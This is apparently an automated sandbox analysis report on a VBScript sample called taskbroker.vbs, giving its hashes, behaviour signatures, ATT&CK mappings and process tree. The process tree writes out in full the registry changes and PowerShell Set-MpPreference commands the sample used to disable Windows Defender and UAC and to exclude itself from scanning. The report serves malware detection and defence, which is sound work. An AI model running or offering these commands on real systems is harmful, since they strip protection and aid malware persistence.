Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 21:04
Static task
static1
Behavioral task
behavioral1
Sample
taskbroker.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
taskbroker.vbs
Resource
win10v2004-20250314-en
General
-
Target
taskbroker.vbs
-
Size
3KB
-
MD5
ec056bdc0223f3f5df9ae591cba9b24c
-
SHA1
0f1688d29ef4d471664e5091b378250b3bea2805
-
SHA256
af65072fd228a47cc3e8a8d1461688c1b53c2ec91949b472decba4d97289253b
-
SHA512
2e0ae2af69b93cd6dd27aab7d8a04f02db6b2dc7a47d50e1ee9e91cd5461733bb8176dd0ed696ecb77a7514541db7449eacf43d07a933c8c8e0c82897eff0ac4
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" WScript.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" WScript.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" WScript.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" WScript.exe -
pid Process 2836 powershell.exe 2668 powershell.exe 2740 powershell.exe 916 powershell.exe 2408 powershell.exe 2652 powershell.exe 2912 powershell.exe 2708 powershell.exe 2100 powershell.exe 920 powershell.exe 2932 powershell.exe 1156 powershell.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2668 powershell.exe 2912 powershell.exe 2836 powershell.exe 2740 powershell.exe 916 powershell.exe 2932 powershell.exe 2652 powershell.exe 920 powershell.exe 2100 powershell.exe 2708 powershell.exe 2408 powershell.exe 1156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2864 wrote to memory of 2820 2864 WScript.exe 30 PID 2864 wrote to memory of 2820 2864 WScript.exe 30 PID 2864 wrote to memory of 2820 2864 WScript.exe 30 PID 2820 wrote to memory of 2912 2820 WScript.exe 31 PID 2820 wrote to memory of 2912 2820 WScript.exe 31 PID 2820 wrote to memory of 2912 2820 WScript.exe 31 PID 2820 wrote to memory of 2932 2820 WScript.exe 33 PID 2820 wrote to memory of 2932 2820 WScript.exe 33 PID 2820 wrote to memory of 2932 2820 WScript.exe 33 PID 2820 wrote to memory of 2708 2820 WScript.exe 35 PID 2820 wrote to memory of 2708 2820 WScript.exe 35 PID 2820 wrote to memory of 2708 2820 WScript.exe 35 PID 2820 wrote to memory of 2836 2820 WScript.exe 37 PID 2820 wrote to memory of 2836 2820 WScript.exe 37 PID 2820 wrote to memory of 2836 2820 WScript.exe 37 PID 2820 wrote to memory of 2668 2820 WScript.exe 39 PID 2820 wrote to memory of 2668 2820 WScript.exe 39 PID 2820 wrote to memory of 2668 2820 WScript.exe 39 PID 2820 wrote to memory of 2740 2820 WScript.exe 41 PID 2820 wrote to memory of 2740 2820 WScript.exe 41 PID 2820 wrote to memory of 2740 2820 WScript.exe 41 PID 2820 wrote to memory of 2100 2820 WScript.exe 43 PID 2820 wrote to memory of 2100 2820 WScript.exe 43 PID 2820 wrote to memory of 2100 2820 WScript.exe 43 PID 2820 wrote to memory of 920 2820 WScript.exe 45 PID 2820 wrote to memory of 920 2820 WScript.exe 45 PID 2820 wrote to memory of 920 2820 WScript.exe 45 PID 2820 wrote to memory of 916 2820 WScript.exe 46 PID 2820 wrote to memory of 916 2820 WScript.exe 46 PID 2820 wrote to memory of 916 2820 WScript.exe 46 PID 2820 wrote to memory of 2408 2820 WScript.exe 49 PID 2820 wrote to memory of 2408 2820 WScript.exe 49 PID 2820 wrote to memory of 2408 2820 WScript.exe 49 PID 2820 wrote to memory of 2652 2820 WScript.exe 50 PID 2820 wrote to memory of 2652 2820 WScript.exe 50 PID 2820 wrote to memory of 2652 2820 WScript.exe 50 PID 2820 wrote to memory of 1156 2820 WScript.exe 53 PID 2820 wrote to memory of 1156 2820 WScript.exe 53 PID 2820 wrote to memory of 1156 2820 WScript.exe 53 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" WScript.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\taskbroker.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\taskbroker.vbs" /elevate2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -DisableBehaviorMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -DisableBlockAtFirstSeen $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -DisableScriptScanning $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -MAPSReporting 03⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ModerateThreatDefaultAction 63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -LowThreatDefaultAction 63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -SevereThreatDefaultAction 63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\taskbroker.vbs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
3Windows Service
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD556029bbc546f2d6c325bf0fcfb2afb6d
SHA1a016291251da5a6196fb432e429dc09f883f0af3
SHA2560d6709b515162c4942db946d7881c17b429b2374bf33fa44c074a889d1175e11
SHA5120b8a900b9ab27e5e0c72a4cdd4101feed1885c33509b2c438b2f242563f9e15dc629d3ff9d2a35b911beec096aa0c66b31bdb134140eee0671f837e609cdd7dc